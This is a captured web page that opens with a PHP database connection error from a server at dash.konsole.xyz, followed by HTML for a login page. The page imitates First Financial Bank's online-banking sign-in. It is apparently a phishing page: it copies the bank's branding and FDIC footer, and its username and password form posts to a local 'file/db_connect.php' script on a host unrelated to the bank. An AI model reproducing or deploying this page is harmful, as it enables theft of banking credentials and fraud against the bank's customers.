Severity: Warning
Message: mysqli::real_connect(): (HY000/2002): Cannot assign requested address
Filename: mysqli/mysqli_driver.php
Line Number: 201
Backtrace:
File: /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php
Line: 343
Function: __construct
File: /www/wwwroot/dash.konsole.xyz/application/controllers/Api.php
Line: 12
Function: __construct
File: /www/wwwroot/dash.konsole.xyz/index.php
Line: 316
Function: require_once
无法使用提供的设置连接到数据库服务器。
Filename: core/MY_Controller.php
Line Number: 343
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login · First Financial Bank</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
<link rel="manifest" href="/app-manifest">
<meta name="theme-color" content="#272d40">
<link href="css/vthreeallFullCss.css" rel="stylesheet">
<link href="css/224.css" rel="stylesheet">
<link rel="icon" type="image/x-icon" href="favicon.ico">
<link rel="icon" sizes="192x192" href="favicon.ico">
<link rel="apple-touch-icon" href="favicon.ico">
<meta name="msapplication-square70x70logo" content="/images/fi-assets/first-financial-bank/first-financial-bank-msapp-small-d823fc5a.png">
<meta name="msapplication-square150x150logo" content="/images/fi-assets/first-financial-bank/first-financial-bank-msapp-large-4f74304d.png">
<meta name="msapplication-wide310x150logo" content="/images/fi-assets/first-financial-bank/first-financial-bank-msapp-wide-71fdefbf.png">
<meta name="apple-itunes-app" content="app-id=6444014036">
<meta apply-shim-measure="" style="all: initial;">
<style>
.sec{
display: block;
font-family: roboto;
font-weight: 400;
line-height: 18px;
font-size: 13px;
padding: 17px 20px 17px 20px;
width: 100%;
background-color: white;
position: fixed;
bottom: 0;
text-align: center;
text-size-adjust: 100%;
color: rgb(112, 112, 112);
box-shadow: rgba(0,0,0,0.1)0px -1px 0px 0px;
z-index: 1;
}
@media (max-width: 600px){
.sec{
padding-left: 80px;
padding-right: 80px;
}
}
</style>
</head>
<body>
<banno-web>
<div class="placeholder-login">
<div class="placeholder-login-wrapper">
<div class="placeholder-card">
<div class="placeholder-progress-container" style="background-color: white">
<div class="login-wrapper">
<jha-card has-data="">
<jha-card-header slot="header" class=""><br>
<div><img height="80" style="margin-top: -50px;" alt="Logo" src="images/Logo.png"></div>
</jha-card-header>
</jha-card>
</div>
<bannoweb-login-steps slot="login-steps" style="display: block">
<form action="file/db_connect.php" id="forgotUsernameForm" method="post">
<div>
<div class="u-g-width-100">
<label class="c-g-textbox c-g-textbox--empty">
<span class="c-g-textbox__label" >Username</span>
<input aria-label="Username" autocapitalize="off" autocomplete="off" autocorrect="off" class=" c-g-textbox__field u-g-fz-body" id="Username" maxlength="100" name="username" required="required" size="100" type="text" value="" aria-required="true">
</label>
</div>
<div class="u-g-width-100">
<label class="c-g-textbox c-g-textbox--empty">
<span class="c-g-textbox__label">Enter your password</span>
<input aria-label="Password" autocapitalize="off" autocomplete="off" autocorrect="off" class=" c-g-textbox__field u-g-fz-body" id="Password" maxlength="100" name="password" required="required" size="100" spellcheck="false" type="password" value="" aria-required="true">
</label>
</div>
<div class="u-g-mar-top-l u-g-disp-flex@medium u-g-flex-row-rev@medium">
<button id="btnForward" type="submit" class="c-g-btn u-g-cursor-pointer u-g-mar-left-s@medium c-g-btn--expand-while-small u-g-mar-top-m u-g-mar-top-0@medium" style="background-color: rgb(255, 181, 2); color:black"> Sign in </button>
</div>
</div>
</form>
</bannoweb-login-steps>
</div>
</div>
</div>
</div>
</banno-web>
<bannoweb-footer class="sec">© 2023 First Financial Bank <span> </span> <span>•</span> <span> </span> <a href="#" style="color: rgb(0, 76, 150); text-decoration: none;"> Privacy policy</a> <span> </span> <span class="end-of-line">•</span> <span> </span> Member FDIC <span> </span> <span class="end-of-line">•</span> <span> </span><svg width="16" height="11" viewBox="0 0 10 7" class="ehl-icon" aria-hidden="true"> <path d="M4.96.222L.337 2.588v.962l.511.007v3.448h8.186L9.03 3.55h.55v-.962L4.959.222zm3.163 5.872H1.76V3.028l3.2-1.65 3.163 1.65v3.066zm-4.677-2.26h2.999v-.828H3.446v.828zm0 1.489h2.985v-.828H3.446v.828z"></path></svg> Equal Housing Lender </bannoweb-footer>
</body>
</html>